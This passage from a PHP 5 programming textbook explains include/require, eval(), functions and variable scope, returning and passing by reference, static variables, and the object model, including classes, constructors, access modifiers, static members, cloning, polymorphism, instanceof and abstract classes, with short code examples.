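print 'The value of $MY_OK is ' . "$MY_OK\n";
print "include returned: $returned\n";

unlink($file);  // clean up the temporary file
```

The first line of output matches the example above; the second should read "include returned: loaded".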

You can use both relative and absolute paths as the file name. Many developers like using absolute path names and create them by concatenating the server’s document root and the relative path name. This allows them great flexibility when moving their PHP application among different servers and PHP installations. For example:

    include $_SERVER["DOCUMENT_ROOT"] . "/myscript.php";

In addition, if the INI directive allow_url_fopen is enabled in your PHP configuration (the default), you can also include URLs. This method is not recommended for performance reasons because PHP must first download the source code to be included before it runs it. So, use this option only when it’s really necessary. Here’s an example:

    include "http://www.example.org/example.php";

The included URL must return a valid PHP script and not a web page which is HTML (possibly created by PHP). You can also use other protocols besides HTTP, such as FTP.

When the included file or URL doesn’t exist, include emits a PHP warning but does not halt execution. If you want PHP to error out in such a case (usually, this is a fatal condition, so that’s what you’d probably want), you can use the require statement, which is otherwise identical to include.

There are two additional variants of include/require, which are probably the most useful: include_once/require_once. They behave exactly like their include/require counterparts, except that they “remember” what files have been included, and if you try to include_once/require_once the same file again, it is just ignored. This behavior is similar to the C workaround for not including the same header files more than once. For the C developers among you, here’s pretty much the require_once equivalent in C:

    my_header.h:

    #ifndef MY_HEADER_H
    #define MY_HEADER_H 1
    ... /* The file's code */
    #endif

2.7.3.2 eval()

eval() is similar to include, but instead of compiling and executing code that comes from a file, it accepts the code as a string. This can be useful for running dynamically created code or retrieving code from an external data source manually (for example, a database) and then executing it. As the use of eval() is much less efficient than writing the code as part of your PHP code, we encourage you not to use it unless you can’t do without:

    $str = '$var = 5;';
    eval($str);
    print $var;

This prints as

    5

Tip: Variables that are based on user input should never be directly passed to eval() because this might allow the user to execute arbitrary code.

2.8 FUNCTIONS

A function in PHP can be built-in or user-defined; however, they are both called the same way. The general form of a function call is

    func(arg1,arg2,...)

The number of arguments varies from one function to another. Each argument can be any valid expression, including other function calls.

Here is a simple example of a predefined function:

    $length = strlen("John");

strlen is a standard PHP function that returns the length of a string. Therefore, $length is assigned the length of the string "John": four.

Here’s an example of a function call being used as a function argument:

    $length = strlen(strlen("John"));

You probably already guessed the result of this example. First, the inner strlen("John") is executed, which results in the integer 4. So, the code simplifies to

    $length = strlen(4);

strlen() expects a string, and therefore (due to PHP’s magical auto-conversion between types) converts the integer 4 to the string "4". Thus, the resulting value of $length is 1, the length of "4".

2.8.1 User-Defined Functions

The general way of defining a function is

    function function_name (arg1, arg2, arg3, ...)
    {
        statement list
    }

To return a value from a function, you need to make a call to return expr inside your function. This stops execution of the function and returns expr as the function’s value.

The following example function accepts one argument, $x, and returns its square:

    function square ($x)
    {
        return $x*$x;
    }

After defining this function, it can be used as an expression wherever you desire. For example:

    print 'The square of 5 is ' . square(5);

2.8.2 Function Scope

Every function has its own set of variables. Any variables used outside the function’s definition are not accessible from within the function by default. When a function starts, its function parameters are defined. When you use new variables inside a function, they are defined within the function only and don’t hang around after the function call ends. In the following example, the variable $var is not changed by the function call:

    function func ()
    {
        $var = 2;
    }

    $var = 1;
    func();
    print $var;

When the function func is called, the variable $var, which is assigned 2, is only in the scope of the function and thus does not change $var outside the function. The code snippet prints out 1.

Now what if you actually do want to access and/or change $var on the outside? As mentioned in the “Variables” section, you can use the built-in $GLOBALS[] array to access variables in the global scope of the script.

Rewrite the previous script the following way:

    function func ()
    {
        $GLOBALS["var"] = 2;
    }

    $var = 1;
    func();
    print $var;

It prints the value 2.

The global keyword also enables you to declare what global variables you want to access, causing them to be imported into the function’s scope. However, using this keyword is not recommended for various reasons, such as misbehaving with assigning values by reference, not supporting unset(), and so on. Here’s a short description of it, but please, don’t use it!

The syntax is

    global $var1, $var2, ...;

Adding a global line for the previous example results in the following:

    function func()
    {
        global $var;
        $var = 2;
    }

    $var = 1;
    func();
    print $var;

This way of writing the example also prints the number 2.

2.8.3 Returning Values By Value

You can tell from the previous example that the return statement is used to return values from functions. The return statement returns values by value, which means that a copy of the value is created and is returned to the caller of the function. For example:

    function get_global_variable_value($name)
    {
        return $GLOBALS[$name];
    }

    $num = 10;
    $value = get_global_variable_value("num");
    print $value;

This code prints the number 10. However, making changes to $value before the print statement only affects $value and not the global variable $num. This is because its value was returned by get_global_variable_value() by value and not by reference.

2.8.4 Returning Values By Reference

PHP also allows you to return variables by reference. This means that you’re not returning a copy of the variable, but a reference to the variable itself, which enables you to change it from the calling scope. To return a variable by reference, you need to define the function as such by placing an & sign in front of the function’s name and, in the caller’s code, assigning the return value by reference to $value:

    function &get_global_variable($name)
    {
        return $GLOBALS[$name];
    }

    $num = 10;
    $value =& get_global_variable("num");
    print $value . "\n";
    $value = 20;
    print $num;

The previous code prints as

    10
    20

You can see that $num was successfully modified by modifying $value, because it is a reference to the global variable $num.

You won’t need to use this returning method often. When you do, use it with care, because forgetting to assign by reference the by-reference returned value can lead to bugs that are difficult to track down.
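The pitfall mentioned above, forgetting =& on the caller's side, is easier to see in a small sketch. Instead of a global variable, this version returns a reference to a static variable; the function name counter() and all variable names are hypothetical and chosen only for illustration.

```php
<?php
// Hypothetical function that returns a reference to its own static counter.
function &counter()
{
    static $count = 0;
    return $count;
}

$copy = counter();       // plain assignment: $copy is only a copy
$copy = 100;             // does not touch the static $count
$afterCopy = counter();  // still 0

$ref =& counter();       // reference assignment: $ref is bound to $count
$ref = 20;               // changes the static $count itself
$afterRef = counter();   // now 20

print "$afterCopy $afterRef\n";
```

This should print "0 20". The function is declared with & in both cases; only the assignment with =& actually keeps the reference.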

2.8.5 Declaring Function Parameters

As previously mentioned, you can pass an arbitrary number of arguments to a function. There are two different ways of passing these arguments. The first is the most common, which is called passing by value, and the second is called passing by reference. Which kind of argument passing you would like is specified in the function definition itself and not during the function call.

2.8.5.1 By-Value Parameters

Here, the argument can be any valid expression, the expression is evaluated, and its value is assigned to the corresponding variable in the function. For example, here, $x is assigned the value 8 and $y is assigned the value of $c:

    function pow($x, $y)
    {
        ...
    }

    pow(2*4, $c);

2.8.5.2 By-Reference Parameters

Passing by reference requires the argument to be a variable. Instead of the variable’s value being passed, the corresponding variable in the function directly refers to the passed variable whenever used. Thus, if you change it inside the function, it affects the sent variable in the outer scope as well:

    function square(&$n)
    {
        $n = $n*$n;
    }

    $number = 4;
    square($number);
    print $number;

The & sign that precedes $n in the function parameters tells PHP to pass it by reference, and the result of the function call is that $number is squared; thus, this code would print 16.

2.8.5.3 Default Parameters

Default parameters like those in C++ are supported by PHP. Default parameters enable you to specify a default value for function parameters that aren’t passed to the function during the function call. The default values you specify must be a constant value, such as a scalar, array with scalar values, or constant.

The following is an example for using default parameters:

    function increment(&$num, $increment = 1)
    {
        $num += $increment;
    }

    $num = 4;
    increment($num);
    increment($num, 3);

This code results in $num being incremented to 8. First, it is incremented by 1 by the first call to increment, where the default increment size of 1 is used, and second, it is incremented by 3, altogether by 4.

Note: When you call a function with default arguments, after you omit a default function argument, you must omit any following arguments. This also means that following a default argument in the function’s definition, all other arguments must also be declared as default arguments.

2.8.6 Static Variables

Like C, PHP supports declaring local function variables as static. These kinds of variables remain intact in between function calls, but are still only accessible from within the function in which they are declared. Static variables can be initialized, and this initialization only takes place the first time the static declaration is reached.

Here’s an example for the use of static that runs initialization code the first time (and only the first time) the function is run:

    function do_something()
    {
        static $first_time = true;

        if ($first_time) {
            // Execute this code only the first time the function is called
            ...
            $first_time = false;
        }

        // Execute the function's main logic every time the function is called
        ...
    }
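A static variable and a default parameter can be combined in a small, runnable sketch. The function next_id() and its 'id' prefix are hypothetical; they are not part of PHP and are used here only to show that the static initialization happens once while the default value is applied on every call that omits the argument.

```php
<?php
// Hypothetical ID generator.
function next_id($prefix = 'id')
{
    static $counter = 0;   // initialized only the first time this line is reached
    $counter++;            // the value survives between calls
    return $prefix . $counter;
}

$a = next_id();        // default prefix is used
$b = next_id();        // the counter kept its value from the first call
$c = next_id('row');   // explicit prefix, same shared counter

print "$a $b $c\n";
```

This should print "id1 id2 row3".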

2.9 SUMMARY

This chapter covered PHP’s basic language features, including variables, control structures, and functions. You have learned all that there is to know syntax-wise to become productive with the language in a procedural, function-based style. The next chapter covers PHP’s support for developers who want to develop using the object-oriented paradigm.

CHAPTER 3

PHP 5 OO Language

“High thoughts must have a high language.” (Aristophanes)

3.1 INTRODUCTION

PHP 3 is the version that introduced support for object-oriented programming (OOP). Although useable, the support was extremely simplistic and not very much improved upon with the release of PHP 4, where backward compatibility was the main concern. Because of popular demand for improved OOP support, the entire object model was completely redesigned for PHP 5, adding a large number of features and changing the behavior of the base “object” itself.

If you are new to PHP, this chapter covers the object-oriented model. Even if you are familiar with PHP 4, you should read it because almost everything about OOP has changed with PHP 5.

When you finish reading this chapter, you will have learned

☞ The basics of the OO model
☞ Object creation and life-time, and how it is controlled
☞ The three main access restriction keywords (public, protected, and private)
☞ The benefits of using class inheritance
☞ Tips for successful exception handling

3.2 OBJECTS

The main difference in OOP as opposed to procedural, function-based programming is that the data and code are bundled together into one entity, which is known as an object. Object-oriented applications are usually split up into a number of objects that interact with each other. Each object is usually an entity of the problem, which is self-contained and has a bunch of properties and methods. The properties are the object’s data, which basically means the variables that belong to the object. The methods, if you are coming from a function-based background, are basically the functions that the object supports. Going one step further, the functionality that is intended for other objects to be accessed and used during interaction is called an object’s interface.

Figure 3.1 represents a class. A class is a template for an object and describes what methods and properties an object of this type will have. In this example, the class represents a person. For each person in your application, you can make a separate instance of this class that represents the person’s information. For example, if two people in our application are called Joe and Judy, we would create two separate instances of this class and would call the setName() method of each with their names to initialize the variable holding the person’s name, $name. The methods and members that other interacting objects may use are a class’s contract. In this example, the person’s contracts to the outside world are the two set and get methods, setName() and getName().

Fig. 3.1 Diagram of class Person.

The following PHP code defines the class, creates two instances of it, sets the name of each instance appropriately, and prints the names:

    class Person
    {
        private $name;

        function setName($name)
        {
            $this->name = $name;
        }

        function getName()
        {
            return $this->name;
        }
    }

    $judy = new Person();
    $judy->setName("Judy");

    $joe = new Person();
    $joe->setName("Joe");

    print $judy->getName() . "\n";
    print $joe->getName() . "\n";

3.3 DECLARING A CLASS

You might have noticed from the previous example that declaring a class (an object template) is simple. You use the class keyword, give the class a name, and list all the methods and properties an instance of this class should have:

    class MyClass
    {
        ... // List of methods
        ...
        ... // List of properties
        ...
    }

You may have noticed that, in front of the declaration of the $name property, we used the private keyword. We explain this keyword in detail later, but it basically means that only methods in this class can access $name. It forces anyone wanting to get/set this property to use the getName() and setName() methods, which represent the class’s interface for use by other objects or source code.

3.4 THE new KEYWORD AND CONSTRUCTORS

Instances of classes are created using the new keyword. In the previous example, we created a new instance of the Person class using $judy = new Person();. What happens during the new call is that a new object is allocated with its own copies of the properties defined in the class you requested, and then the constructor of the object is called in case one was defined. The constructor is a method named __construct(), which is automatically called by the new keyword after creating the object. It is usually used to automatically perform various initializations

such as property initializations. Constructors can also accept arguments, in which case, when the new statement is written, you also need to send the constructor the function parameters in between the parentheses.

In PHP 4, instead of using __construct() as the constructor’s name, you had to define a method with the class’s name, like C++. This still works with PHP 5, but you should use the new unified constructor naming convention for new applications.

We could have rewritten the previous example to pass the names of the people on the new line:

    class Person
    {
        function __construct($name)
        {
            $this->name = $name;
        }

        function getName()
        {
            return $this->name;
        }

        private $name;
    }

    $judy = new Person("Judy");
    $joe = new Person("Joe");

    print $judy->getName() . "\n";
    print $joe->getName() . "\n";

This code has the same result as the previous example.

Tip: Because a constructor cannot return a value, the most common practice for raising an error from within the constructor is by throwing an exception.

3.5 DESTRUCTORS

Destructor functions are the opposite of constructors. They are called when the object is being destroyed (for example, when there are no more references to the object). As PHP makes sure all resources are freed at the end of each request, the importance of destructors is limited. However, they can still be useful for performing certain actions, such as flushing a resource or logging information on object destruction. There are two situations where your destructor might be called: during your script’s execution when all references to an object are destroyed, or when the end of the script is reached and PHP

ends the request. The latter situation is delicate because you are relying on some objects that might already have had their destructors called and are not accessible anymore. So, use it with care, and don’t rely on other objects in your destructors.

Defining a destructor is as simple as adding a __destruct() method to your class:

    class MyClass
    {
        function __destruct()
        {
            print "An object of type MyClass is being destroyed\n";
        }
    }

    $obj = new MyClass();
    $obj = NULL;

This script prints

    An object of type MyClass is being destroyed

In this example, when $obj = NULL; is reached, the only handle to the object is destroyed, and therefore the destructor is called, and the object itself is destroyed. Even without the last line, the destructor would be called, but it would be at the end of the request during the execution engine’s shutdown.

Tip: The exact point in time of the destructor being called is not guaranteed by PHP, and it might be a few statements after the last reference to the object has been released. Thus, take care not to write your application in a way where this could hurt you.

3.6 ACCESSING METHODS AND PROPERTIES USING THE $this VARIABLE

During the execution of an object’s method, a special variable called $this is automatically defined, which denotes a reference to the object itself. By using this variable and the -> notation, the object’s methods and properties can be further referenced. For example, you can access the $name property by using $this->name (note that you don’t use a $ before the name of the property). An object’s methods can be accessed in the same way; for example, from inside one of Person’s methods, you could call getName() by writing $this->getName().
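Constructors, destructors, and $this can be seen working together in the following sketch. The EventLog class is a hypothetical helper introduced only so the order of events can be inspected afterwards; it is not part of PHP. The Person class follows the chapter's example, with a destructor added.

```php
<?php
// Hypothetical helper that collects messages in order.
class EventLog
{
    public $events = array();
}

class Person
{
    private $name;
    private $log;

    function __construct($name, $log)
    {
        $this->name = $name;
        $this->log = $log;
        // A method is called through $this, just like a property.
        $this->log->events[] = "created " . $this->getName();
    }

    function getName()
    {
        return $this->name;
    }

    function __destruct()
    {
        $this->log->events[] = "destroyed " . $this->name;
    }
}

$log = new EventLog();
$judy = new Person("Judy", $log);
$judy = NULL;                       // the only reference is released here
$log->events[] = "after release";

print implode("\n", $log->events) . "\n";
```

With the standard PHP engine, this should print "created Judy", "destroyed Judy", and "after release" in that order, because the destructor runs as soon as the last reference is released. As the tip above notes, it is safer not to build application logic on that exact timing.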

3.6.1 public, protected, and private Properties

A key paradigm in OOP is encapsulation and access protection of object properties (also referred to as member variables). Most common OO languages have three main access restriction keywords: public, protected, and private.

When defining a class member in the class definition, the developer needs to specify one of these three access modifiers before declaring the member itself. In case you are familiar with PHP 3 or 4’s object model, all class members were defined with the var keyword, which is equivalent to public in PHP 5. var has been kept for backward compatibility, but it is deprecated; thus, you are encouraged to convert your scripts to the new keywords:

    class MyClass {
        public $publicMember = "Public member";
        protected $protectedMember = "Protected member";
        private $privateMember = "Private member";

        function myMethod()
        {
            // ...
        }
    }

    $obj = new MyClass();

This example will be built upon to demonstrate the use of these access modifiers. First, the more boring definitions of each access modifier:

☞ public. Public members can be accessed both from outside an object, by using $obj->publicMember, and from inside the myMethod method via the special $this variable (for example, $this->publicMember). If another class inherits a public member, the same rules apply, and it can be accessed both from outside the derived class’s objects and from within its methods.

☞ protected. Protected members can be accessed only from within an object’s method (for example, $this->protectedMember). If another class inherits a protected member, the same rules apply, and it can be accessed from within the derived object’s methods via the special $this variable.

☞ private. Private members are similar to protected members because they can be accessed only from within an object’s method. However, they are also inaccessible from a derived object’s methods. Because private properties aren’t visible from inheriting classes, two related classes may declare the same private properties. Each class will see its own private copy, and the two copies are unrelated.
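The last point, that a parent and a child may each declare a private property of the same name, can be sketched as follows. The class names Base and Derived and the property values are assumptions made for this illustration only.

```php
<?php
// Hypothetical classes for illustration; not taken from the chapter.
class Base {
    private $secret = "base secret";
    protected $shared = "base shared";

    function baseSecret()
    {
        // Runs in Base's scope, so it sees Base's private $secret.
        return $this->secret;
    }
}

class Derived extends Base {
    // A separate property: Base's private $secret is not visible here.
    private $secret = "derived secret";

    function derivedSecret()
    {
        // Runs in Derived's scope, so it sees Derived's private $secret.
        return $this->secret;
    }

    function shared()
    {
        // Protected members are visible in inheriting classes.
        return $this->shared;
    }
}

$obj = new Derived();
print $obj->baseSecret() . "\n";
print $obj->derivedSecret() . "\n";
print $obj->shared() . "\n";
```

Which copy of $secret is read depends on the class in which the method was defined, not on the class of the object.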

Usually, you would use public for members you want to be accessible from outside the object’s scope (i.e., its methods), and private for members that are internal to the object’s logic. Use protected for members that are internal to the object’s logic, but where it might make sense for inheriting classes to override them:

    class MyDbConnectionClass {
        public $queryResult;
        protected $dbHostname = "localhost";
        private $connectionHandle;

        // ...
    }

    class MyFooDotComDbConnectionClass extends MyDbConnectionClass {
        protected $dbHostname = "foo.com";
    }

This incomplete example shows typical use of each of the three access modifiers. This class manages a database connection including queries made to the database:

☞ The connection handle to the database is held in a private member, because it is used by the class’s internal logic and shouldn’t be accessible to the user of this class.

☞ In this example, the database hostname isn’t exposed to the user of the MyDbConnectionClass class. To override it, the developer may inherit from the initial class and change the value.

☞ The query result itself should be accessible to the developer and has, therefore, been declared as public.

Note that access modifiers are designed so that classes (or more specifically, their interfaces to the outer world) always keep an is-a relationship during inheritance. Therefore, if a parent declares a member as public, the inheriting child must also declare it as public. Otherwise, the child would not have an is-a relationship with the parent; an is-a relationship means that anything you can do with the parent can also be done with the child.

3.6.2 public, protected, and private Methods

Access modifiers may also be used in conjunction with object methods, and the rules are the same:

☞ public methods can be called from any scope.

☞ protected methods can only be called from within one of its class methods or from within an inheriting class.

☞ private methods can only be called from within one of its class methods and not from an inheriting class. As with properties, private methods may be redeclared by inheriting classes. Each class will see its own version of the method:

    class MyDbConnectionClass {
        public function connect()
        {
            $conn = $this->createDbConnection();
            $this->setDbConnection($conn);
            return $conn;
        }

        protected function createDbConnection()
        {
            return mysql_connect("localhost");
        }

        private function setDbConnection($conn)
        {
            $this->dbConnection = $conn;
        }

        private $dbConnection;
    }

    class MyFooDotComDbConnectionClass extends MyDbConnectionClass {
        protected function createDbConnection()
        {
            return mysql_connect("foo.com");
        }
    }

This skeleton code example could be used for a database connection class. The connect() method is meant to be called by outside code. The createDbConnection() method is an internal method but enables you to inherit from the class and change it; thus, it is marked as protected. The setDbConnection() method is completely internal to the class and is therefore marked as private.

Note: When no access modifier is given for a method, public is used as the default. In the remaining chapters, public will often not be specified for this reason.

3.6.3 Static Properties

As you know by now, classes can declare properties. Each instance of the class (i.e., object) has its own copy of these properties. However, a class can also contain static properties. Unlike regular properties, these belong to the class itself and not to any instance of it. Therefore, they are often called

class properties as opposed to object or instance properties. You can also think of static properties as global variables that sit inside a class but are accessible from anywhere via the class.

Static properties are defined by using the static keyword:

    class MyClass {
        static $myStaticVariable;
        static $myInitializedStaticVariable = 0;
    }

To access static properties, you have to qualify the property name with the class it sits in:

    MyClass::$myInitializedStaticVariable++;
    print MyClass::$myInitializedStaticVariable;

This example prints the number 1.

If you’re accessing the member from inside one of the class methods, you may also refer to the property by prefixing it with the special class name self, which is short for the class to which the method belongs:

    class MyClass {
        static $myInitializedStaticVariable = 0;

        function myMethod()
        {
            print self::$myInitializedStaticVariable;
        }
    }

    $obj = new MyClass();
    $obj->myMethod();

This example prints the number 0.

You are probably asking yourself if this whole static business is really useful. One example of using it is to assign a unique id to all instances of a class:

    class MyUniqueIdClass {
        static $idCounter = 0;

        public $uniqueId;

        function __construct()
        {
            self::$idCounter++;
            $this->uniqueId = self::$idCounter;
        }
    }

    $obj1 = new MyUniqueIdClass();
    print $obj1->uniqueId . "\n";
    $obj2 = new MyUniqueIdClass();
    print $obj2->uniqueId . "\n";

This prints

    1
    2

The first object’s $uniqueId property equals 1 and the latter object’s equals 2.

An even better example for using a static property is in a singleton pattern, which is demonstrated in the next chapter.

3.6.4 Static Methods

Similar to static properties, PHP supports declaring methods as static. What this means is that your static methods are part of the class and are not bound to any specific object instance and its properties. Therefore, $this isn’t accessible in these methods, but the class itself is, by using self to access it. Because static methods aren’t bound to any specific object, you can call them without creating an object instance by using the class_name::method() syntax. You may also call them from an object instance using $this->method(), but $this won’t be defined in the called method. For clarity, you should use self::method() instead of $this->method().

Here’s an example:

    class PrettyPrinter {
        static function printHelloWorld()
        {
            print "Hello, World";
            self::printNewline();
        }

        static function printNewline()
        {
            print "\n";
        }
    }

    PrettyPrinter::printHelloWorld();

The example prints the string "Hello, World" followed by a newline. Although it is a useless example, you can see that printHelloWorld() can be called on the class without creating an object instance using the class name, and the static method itself can call another static method of the class, printNewline(), using the self:: notation. You may call a parent’s static method by using the parent:: notation, which will be covered later in this chapter.

3.7 CLASS CONSTANTS

Global constants have existed in PHP for a long time. These could be defined using the define() function, which was described in Chapter 2, “PHP 5 Basic Language.” With improved encapsulation support in PHP 5, you can now define constants inside classes. Similar to static members, they belong to the class and not to instances of the class. Class constants are always case-sensitive. The declaration syntax is intuitive, and accessing constants is similar to accessing static members:

    class MyColorEnumClass {
        const RED = "Red";
        const GREEN = "Green";
        const BLUE = "Blue";

        function printBlue()
        {
            print self::BLUE;
        }
    }

    print MyColorEnumClass::RED;
    $obj = new MyColorEnumClass();
    $obj->printBlue();

This code prints "Red" followed by "Blue". It demonstrates the ability of accessing the constant both from inside a class method with the self keyword and via the class name "MyColorEnumClass".

As their name implies, constants are constant and can be neither changed nor removed after they are defined. Common uses for constants are defining enumerations such as in the previous example or some configuration value such as the database username, which you wouldn’t want the application to be able to change.

Tip: As with global constants, you should write constant names in uppercase letters, because this is a common practice.
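The enumeration use of class constants mentioned above can be sketched a little further. The LogLevel class, its constants, and the label() method are hypothetical names chosen for this illustration; the sketch only shows constants being read through self:: inside the class and through the class name outside it.

```php
<?php
// Hypothetical enumeration-style class; not taken from the chapter.
class LogLevel {
    const DEBUG = 0;
    const WARNING = 1;
    const ERROR = 2;

    // Maps one of the constants above to a printable label.
    static function label($level)
    {
        switch ($level) {
            case self::DEBUG:
                return "debug";
            case self::WARNING:
                return "warning";
            case self::ERROR:
                return "error";
        }
        return "unknown";
    }
}

print LogLevel::label(LogLevel::WARNING) . "\n";
```

Because the values live in the class, callers write LogLevel::WARNING rather than a bare number, and no code can reassign the constant at run time.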

3.8 CLONING OBJECTS

When creating an object (using the new keyword), the returned value is a handle to an object or, in other words, the id number of the object. This is unlike PHP 4, where the value was the object itself. This doesn’t mean that the syntax for calling methods or accessing properties has changed, but the copying semantics of objects have changed.

Consider the following code:

    class MyClass {
        public $var = 1;
    }

    $obj1 = new MyClass();
    $obj2 = $obj1;
    $obj2->var = 2;
    print $obj1->var;

In PHP 4, this code would have printed 1, because $obj2 is assigned the object value of $obj1, therefore creating a copy, leaving $obj1 unchanged. However, in PHP 5, because $obj1 is an object handle (its id number), what is copied to $obj2 is the handle. So, when changing $obj2, you actually change the same object $obj1 is referencing. Running this code snippet, therefore, results in 2 being printed.

Sometimes, though, you really do want to create a copy of the object. How can you achieve that? The solution is the language construct clone. This built-in operator automatically creates a new instance of the object with its own copy of the properties. The property values are copied as is. In addition, you may define a __clone() method that is called on the newly created object to perform any final manipulation.

Note: References are copied as references, and don’t perform a deep copy. This means that if one of your properties points at another variable by reference (after it was assigned by reference), after the automatic cloning, the cloned object will point at the same variable.

Changing the $obj2 = $obj1; line in the previous example to $obj2 = clone $obj1; will assign $obj2 a handle to a new copy of $obj1, resulting in 1 being printed out.

As previously mentioned, for any of your classes, you may implement a __clone() method. After the new (cloned) object is created, your __clone() method is called and the cloned object is accessible using the $this variable.

The following is an example of a typical situation where you might want to implement the __clone() method. Say that you have an object that holds a resource such as a file handle. You may want the new object to not point at the same file handle, but to open a new one itself so that it has its own private copy:

    class MyFile {
        function setFileName($file_name)
        {
            $this->file_name = $file_name;
        }

        function openFileForReading()
        {
            $this->file_handle = fopen($this->file_name, "r");
        }

        function __clone()
        {
            if ($this->file_handle) {
                $this->file_handle = fopen($this->file_name, "r");
            }
        }

        private $file_name;
        private $file_handle = NULL;
    }

Although this code is only partially written, you can see how you can control the cloning process. In this code snippet, $file_name is copied as is from the original object, but if the original object has an open file handle (which was copied to the cloned object), the new copy of the object will create its own copy of the file handle by opening the file by itself.

3.9 POLYMORPHISM

The subject of polymorphism is probably the most important in OOP. Using classes and inheritance makes it easy to describe a real-life situation as opposed to just a collection of functions and data. They also make it much easier to grow projects by reusing code mainly via inheritance. Also, to write robust and extensible code, you usually want to have as few as possible flow-control statements (such as if() statements). Polymorphism answers all these needs and more.

Consider the following code:

    class Cat {
        function miau()
        {
            print "miau";
        }
    }

    class Dog {
        function wuff()
        {
            print "wuff";
        }
    }

    function printTheRightSound($obj)
    {
        if ($obj instanceof Cat) {
            $obj->miau();
        } else if ($obj instanceof Dog) {
            $obj->wuff();
        } else {
            print "Error: Passed wrong kind of object";
        }
        print "\n";
    }

    printTheRightSound(new Cat());
    printTheRightSound(new Dog());

The output is

    miau
    wuff

You can easily see that this example is not extensible. Say that you want to extend it by adding the sounds of three more animals. You would have to add another three else if blocks to printTheRightSound() so you check that the object you have is an instance of one of those new animals, and then you have to add the code to call each sound method.

Polymorphism using inheritance solves this problem. It enables you to inherit from a parent class, inheriting all its methods and properties and thus creating an is-a relationship.

Taking the previous example, we will create a new class called Animal from which all other animal kinds will inherit, thus creating is-a relationships from the specific kinds, such as Dog, to the parent (or ancestor) Animal.

Inheritance is performed by using the extends keyword:

    class Child extends Parent {
        ...
    }

This is how you would rewrite the previous example using inheritance:

    class Animal {
        function makeSound()
        {
            print "Error: This method should be re-implemented in the children";
        }
    }

    class Cat extends Animal {
        function makeSound()
        {
            print "miau";
        }
    }

    class Dog extends Animal {
        function makeSound()
        {
            print "wuff";
        }
    }

    function printTheRightSound($obj)
    {
        if ($obj instanceof Animal) {
            $obj->makeSound();
        } else {
            print "Error: Passed wrong kind of object";
        }
        print "\n";
    }

    printTheRightSound(new Cat());
    printTheRightSound(new Dog());

The output is

    miau
    wuff

You can see that no matter how many animal types you add to this example, you will not have to make any changes to printTheRightSound() because the instanceof Animal check covers all of them, and the $obj->makeSound() call will do so, too.

This example can still be improved upon. Certain modifiers available to you in PHP can give you more control over the inheritance process. They are covered in detail later in this chapter. For example, the class Animal and its method makeSound() can be marked as being abstract, which not only means that you don’t have to give some meaningless implementation for the makeSound() definition in the Animal class, but also forces any inheriting classes to

implement it. Additionally, we could specify access modifiers to the makeSound() method, such as the public modifier, meaning that it can be called anywhere in your code.

Note: PHP does not support multiple inheritance like C++ does. It supplies a different solution for creating more than one is-a relationship for a given class by using Java-like interfaces, which are covered later in this chapter.

3.10 parent:: AND self::

PHP supports two reserved class names that make it easier when writing OO applications. self:: refers to the current class and it is usually used to access static members, methods, and constants. parent:: refers to the parent class and it is most often used when wanting to call the parent constructor or methods. It may also be used to access members and constants. You should use parent:: as opposed to the parent’s class name because it makes it easier to change your class hierarchy because you are not hard-coding the parent’s class name.

The following example makes use of both parent:: and self:: for accessing the Child and Ancestor classes:

    class Ancestor {
        const NAME = "Ancestor";

        function __construct()
        {
            print "In " . self::NAME . " constructor\n";
        }
    }

    class Child extends Ancestor {
        const NAME = "Child";

        function __construct()
        {
            parent::__construct();
            print "In " . self::NAME . " constructor\n";
        }
    }

    $obj = new Child();

The previous example outputs

    In Ancestor constructor
    In Child constructor

Make sure you use these two class names whenever possible.
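parent:: is not limited to constructors. The following minimal sketch, with hypothetical Logger and TimestampLogger classes and a fixed PREFIX constant chosen only to keep the output predictable, shows an overriding method that reuses the parent’s implementation without naming the parent class.

```php
<?php
// Hypothetical classes for illustration; not taken from the chapter.
class Logger {
    function format($message)
    {
        return "[log] " . $message;
    }
}

class TimestampLogger extends Logger {
    // Fixed value so that the result is predictable in this sketch.
    const PREFIX = "2004-09-23";

    function format($message)
    {
        // self:: reads this class's constant; parent:: calls Logger::format()
        // without hard-coding the name Logger.
        return self::PREFIX . " " . parent::format($message);
    }
}

$logger = new TimestampLogger();
print $logger->format("started") . "\n";
```

If TimestampLogger were later made to extend a different class, the body of format() would not need to change.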

3.11 instanceof OPERATOR

The instanceof operator was added as syntactic sugar instead of the already existing is_a() built-in function (which is now deprecated). Unlike the latter, instanceof is used like a logical binary operator:

    class Rectangle {
        public $name = __CLASS__;
    }

    class Square extends Rectangle {
        public $name = __CLASS__;
    }

    class Circle {
        public $name = __CLASS__;
    }

    function checkIfRectangle($shape)
    {
        if ($shape instanceof Rectangle) {
            print $shape->name;
            print " is a rectangle\n";
        }
    }

    checkIfRectangle(new Square());
    checkIfRectangle(new Circle());

This small program prints 'Square is a rectangle\n'. Note the use of __CLASS__, which is a special constant that resolves to the name of the current class.

As previously mentioned, instanceof is an operator and therefore can be used in expressions in conjunction with other operators (for example, the ! [negation] operator). This allows you to easily write a checkIfNotRectangle() function:

    function checkIfNotRectangle($shape)
    {
        if (!($shape instanceof Rectangle)) {
            print $shape->name;
            print " is not a rectangle\n";
        }
    }

Note: instanceof also checks if an object implements an interface (which is also a classic is-a relationship). Interfaces are covered later in this chapter.
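The note about interfaces can be sketched as follows. The Drawable interface and the Line and Point classes are hypothetical names used only for this illustration; the check itself is the same instanceof operator shown above.

```php
<?php
// Hypothetical interface and classes; not taken from the chapter.
interface Drawable {
    function draw();
}

class Line implements Drawable {
    function draw()
    {
        return "line";
    }
}

class Point {
}

function describe($obj)
{
    // True for any object whose class implements Drawable.
    if ($obj instanceof Drawable) {
        return "drawable: " . $obj->draw();
    }
    return "not drawable";
}

print describe(new Line()) . "\n";
print describe(new Point()) . "\n";
```

The function never names Line, so any class added later that implements Drawable is accepted without changing describe().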

3.12 ABSTRACT METHODS AND CLASSES

When designing class hierarchies, you might want to partially leave certain methods for inheriting classes to implement. For example, say you have the class hierarchy shown in Figure 3.2.

Fig. 3.2 Class hierarchy (class Shape, with derived classes Square and Circle).

It might make sense to implement setCenter($x, $y) in class Shape and leave the implementation of the draw() methods to the concrete classes Square and Circle. You would have to declare the draw() method as an abstract method so that PHP knows you are intentionally not implementing it in class Shape. The class Shape would then be called an abstract class, meaning that it’s not a class with complete functionality and is only meant to be inherited from. You cannot instantiate an abstract class. You can define any number of methods as abstract, but once at least one method of a class is defined as abstract, the entire class needs to be declared as abstract, too. This double definition exists to give you the option to define a class abstract even if it doesn’t have any abstract methods, and to force you to define a class with abstract methods as abstract so that it is clear to others what you had in mind.

The previous class diagram would translate into PHP code that’s similar to the following:

    abstract class Shape {
        function setCenter($x, $y)
        {
            $this->x = $x;
            $this->y = $y;
        }

        abstract function draw();

